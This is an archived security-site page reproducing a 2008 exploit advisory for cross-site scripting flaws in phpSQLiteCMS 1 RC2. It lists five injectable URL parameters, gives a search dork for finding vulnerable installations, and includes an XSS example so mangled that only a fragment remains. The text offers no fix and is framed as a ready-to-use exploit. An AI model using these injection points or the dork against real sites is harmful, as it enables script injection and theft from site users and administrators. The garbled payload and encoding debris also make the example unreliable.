TUCoPS :: Web :: CMS / Portals

TUCoPS :: Web :: CMS / Portals :: bx3278.htm
phpSQLiteCMS Multiple Remote XSS Vulnerability

phpSQLiteCMS Multiple Remote XSS Vulnerability phpSQLiteCMS Multiple Remote XSS Vulnerability


===========================================================0D
    phpSQLiteCMS Multiple Remote XSS Vulnerability             =0D
===========================================================0D
=0D
=0D
AUTHOR : CWH Underground=0D
DATE   : 21 May 2008=0D
SITE : www.citec.us=0D 
=0D
=0D
#####################################################=0D
 APPLICATION : phpSQLiteCMS=0D
 VERSION     : 1 RC2 (Lastest Version)=0D
VENDOR : http://downloads.sourceforge.net/phpsqlitecms=0D 
#####################################################=0D
=0D
DORK: "Powered By phpSQLiteCMS"=0D
=0D
---Exploit---=0D
=0D
[-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[home]==0D 
[-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu]==0D 
[-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu_page_overview]==0D 
[-] http://[target]/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_username]==0D 
[-] http://[target]/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_password]==0D 
=0D
=0D
Example for XSS : =0D
	=0D
src=http://www.google.com>=0D</a> 
																		.=0D
=0D
##################################################################=0D
 Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   =0D
##################################################################=0D
 

</b></font></pre></tt></body></html>


<!-- google_ad_section_end -->
<p><center>

<p></center>
<center><a href="/firefox.htm">TUCoPS is optimized to look best in Firefox&reg; on a widescreen monitor (1440x900 or better).</a></center>
<font size=1><center>Site design & layout copyright &copy; 1986-2024 AOH</font>
</center>
<br><center><IMG SRC="http://artofhacking.com/cgi-bin/sc/sc.cgi?acct=tucops&font=payphone-med"></center>
<p>
</body>
</html>